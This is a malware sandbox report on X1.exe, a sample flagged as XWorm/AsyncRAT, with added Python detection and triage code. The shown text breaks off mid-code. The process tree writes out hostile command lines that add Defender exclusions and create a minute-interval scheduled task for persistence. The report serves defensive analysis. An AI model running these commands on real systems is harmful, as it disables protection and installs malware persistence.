                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3286328027.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:2
                                                                              Start time:02:54:40
                                                                              Start date:24/04/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe'
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:02:54:40
                                                                              Start date:24/04/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:02:54:46
                                                                              Start date:24/04/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X1.exe'
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:02:54:46
                                                                              Start date:24/04/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:02:54:59
                                                                              Start date:24/04/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\X1.exe'
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:02:54:59
                                                                              Start date:24/04/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:10
                                                                              Start time:02:55:18
                                                                              Start date:24/04/2024
                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe"
                                                                              Imagebase:0x7ff725d70000
                                                                              File size:235'008 bytes
                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:02:55:18
                                                                              Start date:24/04/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:13
                                                                              Start time:02:55:29
                                                                              Start date:24/04/2024
                                                                              Path:C:\Users\user\AppData\Roaming\X1.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Roaming\X1.exe"
                                                                              Imagebase:0xf90000
                                                                              File size:48'128 bytes
                                                                              MD5 hash:2AB2F26AB78DBD53CEA3B71C00D568C2
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\X1.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\X1.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\X1.exe, Author: Joe Security
                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\X1.exe, Author: ditekSHen
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 79%, ReversingLabs
                                                                              • Detection: 71%, Virustotal, Browse
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:14
                                                                              Start time:02:55:38
                                                                              Start date:24/04/2024
                                                                              Path:C:\Users\user\AppData\Roaming\X1.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Roaming\X1.exe"
                                                                              Imagebase:0xa10000
                                                                              File size:48'128 bytes
                                                                              MD5 hash:2AB2F26AB78DBD53CEA3B71C00D568C2
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:15
                                                                              Start time:02:56:01
                                                                              Start date:24/04/2024
                                                                              Path:C:\Users\user\AppData\Roaming\X1.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Users\user\AppData\Roaming\X1.exe
                                                                              Imagebase:0xf60000
                                                                              File size:48'128 bytes
                                                                              MD5 hash:2AB2F26AB78DBD53CEA3B71C00D568C2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true
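Targets 2 through 15 above are one chain: three Add-MpPreference exclusions (the sample's original path, its process name, and its dropped copy under AppData\Roaming), a schtasks entry that relaunches the dropped copy every minute at the highest run level, and the relaunch itself. The following is an added detection example, not code from the Joe Sandbox report or from the sample: it runs the rules a detection engineer would write for that chain over process-creation records constructed from the command lines shown above (Target 99, a daily "Backup" task, is a constructed benign control). The rule, threshold and directory names are the author's assumptions, not anything the report defines.

```python
"""Detection rules for the defence-evasion and persistence chain in the X1.exe
process tree: Add-MpPreference exclusions, a minute-interval schtasks entry
pointing at a user-writable path, and the excluded binary being relaunched.

Added example; not code from the Joe Sandbox report or from the sample.
The process records below are constructed from the command lines in the
report; Target 99 is a constructed benign control.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    target_id: int   # Joe Sandbox "Target ID" (a PID in real telemetry)
    image: str       # executable path
    cmdline: str
    elevated: bool   # "Has elevated privileges" in the report


@dataclass(frozen=True)
class Finding:
    rule: str
    target_id: int
    subject: str     # path, process name or task action the rule fired on
    detail: str


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\System32\schtasks.exe"
ORIGINAL = r"C:\Users\user\Desktop\X1.exe"
DROPPED = r"C:\Users\user\AppData\Roaming\X1.exe"

# Constructed from the report's process tree; Target 99 is a constructed benign control.
EVENTS = [
    ProcEvent(2, PS, f"\"{PS}\" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '{ORIGINAL}'", True),
    ProcEvent(5, PS, f"\"{PS}\" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X1.exe'", True),
    ProcEvent(8, PS, f"\"{PS}\" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '{DROPPED}'", True),
    ProcEvent(10, SCHTASKS, f"\"{SCHTASKS}\" /create /f /RL HIGHEST /sc minute /mo 1 /tn \"X1\" /tr \"{DROPPED}\"", True),
    ProcEvent(13, DROPPED, f"\"{DROPPED}\"", False),
    ProcEvent(15, DROPPED, DROPPED, True),
    ProcEvent(99, SCHTASKS, f"\"{SCHTASKS}\" /create /sc daily /tn \"Backup\" /tr \"C:\\Program Files\\Backup\\backup.exe\"", True),
]

# Add-MpPreference -Exclusion<Kind> <value>; the value may be single-quoted,
# double-quoted or bare. Matched on the command line alone, so it works whether
# PowerShell was started directly or through cmd.exe. An -EncodedCommand
# variant must be base64-decoded upstream before this rule sees it.
EXCLUSION_RE = re.compile(
    r"Add-MpPreference\s+-Exclusion(?P<kind>Path|Process|Extension|IpAddress)\s+"
    r"(?:'(?P<sq>[^']*)'|\"(?P<dq>[^\"]*)\"|(?P<bare>\S+))", re.IGNORECASE)

# Directories an unprivileged user can write to (assumed list); a task action
# living there is the usual shape of user-level persistence.
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|ProgramData|Public|Downloads|Desktop)\\", re.IGNORECASE)


def parse_schtasks(cmdline):
    """Map each /flag on a schtasks command line to its value (None for bare
    flags such as /create or /f). Quoted values lose their quotes; keys are
    lower-cased because schtasks accepts any case."""
    pat = re.compile(r'/(?P<flag>\w+)(?:\s+(?:"(?P<quoted>[^"]*)"|(?P<bare>(?!/)[^\s"]+)))?')
    args = {}
    for m in pat.finditer(cmdline):
        value = m.group("quoted") if m.group("quoted") is not None else m.group("bare")
        args[m.group("flag").lower()] = value
    return args


def exclusion_findings(ev):
    """Flag any Defender exclusion being added, noting an execution-policy bypass."""
    m = EXCLUSION_RE.search(ev.cmdline)
    if not m:
        return []
    value = next(v for v in (m.group("sq"), m.group("dq"), m.group("bare")) if v is not None)
    detail = f"Defender Exclusion{m.group('kind')} added"
    if re.search(r"-ExecutionPolicy\s+Bypass", ev.cmdline, re.IGNORECASE):
        detail += " via -ExecutionPolicy Bypass"
    return [Finding("defender_exclusion", ev.target_id, value, detail)]


def schtasks_findings(ev):
    """Flag a /create that combines at least two persistence traits: a short
    minute interval, /RL HIGHEST, or an action under a user-writable path."""
    if not ev.image.lower().endswith("schtasks.exe"):
        return []
    a = parse_schtasks(ev.cmdline)
    if "create" not in a:
        return []
    reasons = []
    mo = a.get("mo") or "1"                      # schtasks defaults /mo to 1
    if (a.get("sc") or "").lower() == "minute" and mo.isdigit() and int(mo) <= 5:
        reasons.append(f"fires every {mo} minute(s)")
    if (a.get("rl") or "").upper() == "HIGHEST":
        reasons.append("/RL HIGHEST requested")
    action = a.get("tr") or ""
    if USER_WRITABLE_RE.search(action):
        reasons.append("action runs from a user-writable directory")
    if len(reasons) < 2:                         # one trait alone is common in benign software
        return []
    return [Finding("suspicious_scheduled_task", ev.target_id, action, "; ".join(reasons))]


def correlate(events):
    """Run both rules, then link them: a binary that was excluded from Defender,
    scheduled for relaunch, and subsequently started is the complete chain."""
    findings = []
    for ev in events:
        findings += exclusion_findings(ev) + schtasks_findings(ev)
    excluded = {f.subject.lower() for f in findings if f.rule == "defender_exclusion"}
    scheduled = {f.subject.lower() for f in findings if f.rule == "suspicious_scheduled_task"}
    for ev in events:
        image = ev.image.lower()
        if image in excluded and image in scheduled:
            findings.append(Finding("excluded_task_binary_executed", ev.target_id, ev.image,
                                    f"excluded and scheduled binary started (elevated={ev.elevated})"))
    return findings


if __name__ == "__main__":
    for f in correlate(EVENTS):
        print(f"[{f.rule}] target {f.target_id}: {f.subject} :: {f.detail}")
```

Run stand-alone it prints six findings: the three exclusions, the minute-interval task for the AppData copy, and the two launches of that copy (Targets 13 and 15). The correlation step is what separates this sample's behaviour from an administrator legitimately adding one exclusion or one scheduled task.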


                                                                                Execution Graph

                                                                                Execution Coverage:18%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:33.3%
                                                                                Total number of Nodes:9
                                                                                Total number of Limit Nodes:0

Control-flow Graph (rendered figure; executed/not-executed colouring and the edge list are not reproduced)
• Entry block: 7ff848f1a1bb-7ff848f1a20a
• Basic blocks span: 7ff848f1921a-7ff848f1a5ef
• Calls: 7ff848f18178, 7ff848f10368, 7ff848f10358, 7ff848f18188
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: >$B$SAO_^
                                                                                • API String ID: 0-1231990507
                                                                                • Opcode ID: cd0cee3222b377ebad80498972e528369f7b4532fe403c06ba99ba44c739db18
                                                                                • Instruction ID: e0634b1fbac84a017561f7132612dd2bb24a19669f4f183c5dd8b6f10431dbad
                                                                                • Opcode Fuzzy Hash: cd0cee3222b377ebad80498972e528369f7b4532fe403c06ba99ba44c739db18
                                                                                • Instruction Fuzzy Hash: 2512A170A28A099FE788EB2C8899779B7E2FF88744F54457DD00DD32D1DF38A8818B45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

Control-flow Graph (rendered figure; executed/not-executed colouring and the edge list are not reproduced)
• Entry block: 7ff848f19129-7ff848f191bd
• Basic blocks span: 7ff848f19129-7ff848f1a5ef
• Calls: 7ff848f18d40, 7ff848f10378, 7ff848f17f18, 7ff848f10388, 7ff848f18178, 7ff848f10368, 7ff848f10358, 7ff848f18188
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6$SAO_^
                                                                                • API String ID: 0-3855498335
                                                                                • Opcode ID: 650dbc240be871c892101da1c9e8ca4a672c64252ad3a14d9ee2400b5be173a2
                                                                                • Instruction ID: 70e6ea61cdfcd2464477b1b1ed7a3f25aa683f45f4d53ab9b441f8f2022fe2e0
                                                                                • Opcode Fuzzy Hash: 650dbc240be871c892101da1c9e8ca4a672c64252ad3a14d9ee2400b5be173a2
                                                                                • Instruction Fuzzy Hash: 22C27F70A28A099FE788FF28C499779B7E2FF98744F544579D40DD3291DF38A8818B42
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

Control-flow Graph (rendered figure; executed/not-executed colouring and the edge list are not reproduced)
• Entry block: 7ff848f1fecd-7ff848f1fef5
• Basic blocks span: 7ff848f1fecd-7ff848f209b7
• Calls: 7ff848f105b0, 7ff848f10618, 7ff848f10620, 7ff848f10628, 7ff848f10630, 7ff848f10640, 7ff848f10650, 7ff848f10870, 7ff848f10b10, 7ff848f174d0, 7ff848f1b980, 7ff848f1bd30, 7ff848f1bd58, 7ff848f1bd78, 7ff848f1bd80, 7ff848f1dd88, 7ff848f1dd98, 7ff848f1dda8, 7ff848f1ddb8, 7ff848f1ddc8, 7ff848f1ddd8, 7ff848f1dde8, 7ff848f1ddf8, 7ff848f1de08, 7ff848f1f490
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID: 0-3916222277
                                                                                • Opcode ID: 49ba4fe80ef6c75ab8058f92bd6b7ac6090e512364ffbd7672d9e77be21d0771
                                                                                • Instruction ID: 9dd2e55aa496ee98f9418df33f84df2dd777ecaa9ee61f2181dd5fac1ca4131b
                                                                                • Opcode Fuzzy Hash: 49ba4fe80ef6c75ab8058f92bd6b7ac6090e512364ffbd7672d9e77be21d0771
                                                                                • Instruction Fuzzy Hash: F3626F31B2C9198FEB98FB28845967973E2EFD9380F544578D40EC72C6DE29EC828745
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 850 7ff848f112e9-7ff848f11320 852 7ff848f11d26-7ff848f11d6d 850->852 853 7ff848f11326-7ff848f114ad call 7ff848f10548 * 10 call 7ff848f10648 850->853 903 7ff848f114af-7ff848f114b6 853->903 904 7ff848f114b7-7ff848f11501 call 7ff848f104c0 call 7ff848f104b8 853->904 903->904 913 7ff848f11529-7ff848f11549 904->913 914 7ff848f11503-7ff848f11522 call 7ff848f10358 904->914 920 7ff848f1155a-7ff848f115be call 7ff848f10780 913->920 921 7ff848f1154b-7ff848f11555 call 7ff848f10368 913->921 914->913 931 7ff848f1165e-7ff848f116ec 920->931 932 7ff848f115c4-7ff848f11659 920->932 921->920 952 7ff848f116f3-7ff848f1176f call 7ff848f10e50 call 7ff848f10de8 931->952 932->952 962 7ff848f11772-7ff848f117ab call 7ff848f10378 call 7ff848f10388 952->962 969 7ff848f117ad-7ff848f117b8 962->969 970 7ff848f117d2-7ff848f117f2 962->970 969->962 972 7ff848f117ba-7ff848f117cb call 7ff848f10358 969->972 977 7ff848f11803-7ff848f11862 970->977 978 7ff848f117f4-7ff848f117fe call 7ff848f10368 970->978 972->970 985 7ff848f1188a-7ff848f118aa 977->985 986 7ff848f11864-7ff848f11883 call 7ff848f10358 977->986 978->977 992 7ff848f118bb-7ff848f1199d 985->992 993 7ff848f118ac-7ff848f118b6 call 7ff848f10368 985->993 986->985 1007 7ff848f119eb-7ff848f11a1e 992->1007 1008 7ff848f1199f-7ff848f119d2 992->1008 993->992 1019 7ff848f11a20-7ff848f11a41 1007->1019 1020 7ff848f11a43-7ff848f11a73 1007->1020 1008->1007 1015 7ff848f119d4-7ff848f119e1 1008->1015 1015->1007 1018 7ff848f119e3-7ff848f119e9 1015->1018 1018->1007 1021 7ff848f11a7b-7ff848f11ab2 1019->1021 1020->1021 1028 7ff848f11ab4-7ff848f11ad5 1021->1028 1029 7ff848f11ad7-7ff848f11b07 1021->1029 1031 7ff848f11b0f-7ff848f11b4b 1028->1031 1029->1031 1033 7ff848f11b52-7ff848f11b5d 1031->1033
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: SAO_^
                                                                                • API String ID: 0-3650529936
                                                                                • Opcode ID: a90f958fda9c070e381168e8bf634219d00502b115254e3801482457332b6bce
                                                                                • Instruction ID: c1ebe669d1a7bd18231850df25bc17b72cec9898c1be21653e1f58332660d8b0
                                                                                • Opcode Fuzzy Hash: a90f958fda9c070e381168e8bf634219d00502b115254e3801482457332b6bce
                                                                                • Instruction Fuzzy Hash: A9326134B2DA195FE798FB2884597B976E2FF98340F940579E40EC32C2DF28AC818755
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1056 7ff848f178c1-7ff848f1797d CheckRemoteDebuggerPresent 1060 7ff848f1797f 1056->1060 1061 7ff848f17985-7ff848f179c8 1056->1061 1060->1061
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID: CheckDebuggerPresentRemote
                                                                                • String ID:
                                                                                • API String ID: 3662101638-0
                                                                                • Opcode ID: 953212888384c23dcfe727211dc76676ee0338ec311517e62916064aa7dc9585
                                                                                • Instruction ID: 21da6084ffdc62de655fab4290e5ca04c837187cf5f04468d8f0de993f15002e
                                                                                • Opcode Fuzzy Hash: 953212888384c23dcfe727211dc76676ee0338ec311517e62916064aa7dc9585
                                                                                • Instruction Fuzzy Hash: 5631DF31908B5C8FCB58DF58C88A7EA7BF0EF65321F05426AD489D7292DB34A845CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1d5975956b2b0568b0a8475ff6fc8b372bc109a4b1cdcf03ed4b29169dca7cad
                                                                                • Instruction ID: e7488ab080164a3362921da52638bcd196573e216c3e3dcdcda0fb18a7bc7b5a
                                                                                • Opcode Fuzzy Hash: 1d5975956b2b0568b0a8475ff6fc8b372bc109a4b1cdcf03ed4b29169dca7cad
                                                                                • Instruction Fuzzy Hash: CAF1733090CA8D8FEBA8EF28C8557E977E1FF54350F04426EE84DC7295DB3899458B85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5fcbc037eee054457287cb092699087ed27dff3c60fa92bd575a1cbfc38cf046
                                                                                • Instruction ID: 64641da8183fb361f4a27193d237019e8913b8f3258b6b761eea271e139755cf
                                                                                • Opcode Fuzzy Hash: 5fcbc037eee054457287cb092699087ed27dff3c60fa92bd575a1cbfc38cf046
                                                                                • Instruction Fuzzy Hash: 52E1913090CA8E8FEBA8EF28C8557E977E1FB54350F04426ED84DC7295DB78A8458B85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1c99d33e1ea7b8e7386bd68203dfb1342ccbdfc51c2e30c6216650b355834542
                                                                                • Instruction ID: 3c0568ddc76878b0f2a71ef24ce2f8f6068b1a305479830d48e5d3c82e2688bc
                                                                                • Opcode Fuzzy Hash: 1c99d33e1ea7b8e7386bd68203dfb1342ccbdfc51c2e30c6216650b355834542
                                                                                • Instruction Fuzzy Hash: B2C1A130F2D94A4FEB88FBA8946527976D2FF99384F440579E04EC32D2DF28AC428745
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1035 7ff848f1ad4d-7ff848f1ae30 RtlSetProcessIsCritical 1039 7ff848f1ae38-7ff848f1ae6d 1035->1039 1040 7ff848f1ae32 1035->1040 1040->1039
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalProcess
                                                                                • String ID:
                                                                                • API String ID: 2695349919-0
                                                                                • Opcode ID: bb92bf0b42263fce254f5e696a992227a3d2423b4d054fea95b60b886484c560
                                                                                • Instruction ID: 64f6db92e7f39b35526c70c018c6c2ff7e1f0f3ad0b91f774ce07a4a567b0cb8
                                                                                • Opcode Fuzzy Hash: bb92bf0b42263fce254f5e696a992227a3d2423b4d054fea95b60b886484c560
                                                                                • Instruction Fuzzy Hash: A041B63190C6588FD719DFA8D855BE9BBF0FF56311F04416EE08AC3692CB786846CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1042 7ff848f1b3c8-7ff848f1b3cf 1043 7ff848f1b3da-7ff848f1b44d 1042->1043 1044 7ff848f1b3d1-7ff848f1b3d9 1042->1044 1048 7ff848f1b4d9-7ff848f1b4dd 1043->1048 1049 7ff848f1b453-7ff848f1b458 1043->1049 1044->1043 1050 7ff848f1b462-7ff848f1b49f SetWindowsHookExW 1048->1050 1051 7ff848f1b45f-7ff848f1b460 1049->1051 1052 7ff848f1b4a1 1050->1052 1053 7ff848f1b4a7-7ff848f1b4d8 1050->1053 1051->1050 1052->1053
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID: HookWindows
                                                                                • String ID:
                                                                                • API String ID: 2559412058-0
                                                                                • Opcode ID: 4e8e08f85640bca3594aebec4db08ed256799938d6d8b808734f1ff984fa9145
                                                                                • Instruction ID: ff50ae10c7b1755c46c36adc7a394c49d4711616095d8cd79a67bb8fb3c2b846
                                                                                • Opcode Fuzzy Hash: 4e8e08f85640bca3594aebec4db08ed256799938d6d8b808734f1ff984fa9145
                                                                                • Instruction Fuzzy Hash: 4541263191CA5C8FDB18EF6C98466F9BBE1EB59321F04427ED009C3292CB64A812C7C1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

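                                                                                The three API-bearing functions in this section (CheckRemoteDebuggerPresent at 7ff848f178c1, RtlSetProcessIsCritical at 7ff848f1ad4d, SetWindowsHookExW at 7ff848f1b3c8) are the ones worth pulling out of the disassembly dump for triage. The Python below is an added example, not part of the Joe Sandbox report or of the X1.exe sample: it parses function blocks in the flattened text format shown on this page, takes the literal import name from the control_flow_graph line rather than from the normalized "API ID" field (which renders SetWindowsHookExW as "HookWindows" and CheckRemoteDebuggerPresent as "CheckDebuggerPresentRemote"), and maps each import to a capability. The CAPABILITY table and SAMPLE_REPORT are the editor's own constructions; the sample copies addresses and field values from the blocks above but is not the full report.

```python
"""Triage helper for the disassembly section of a flattened Joe Sandbox report.

Added example, not Joe Sandbox's or the sample's code. Each function block in the
report is a run of lines ending in "Uniqueness Score:"; the optional leading
"control_flow_graph" line carries the CFG nodes and the literal names of any
imports the function calls. CAPABILITY is a hypothetical mapping written for
this example; SAMPLE_REPORT is a constructed excerpt in the page's format.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Imports that say something about behaviour when they show up in dumped code.
CAPABILITY = {
    "CheckRemoteDebuggerPresent": "anti-debugging (asks the kernel whether a debugger is attached)",
    "IsDebuggerPresent": "anti-debugging (reads PEB.BeingDebugged)",
    "RtlSetProcessIsCritical": "self-protection (BreakOnTermination: killing the process bugchecks the host)",
    "SetWindowsHookExW": "hooking (keylogging only if idHook is WH_KEYBOARD_LL; the argument is not in the graph)",
}

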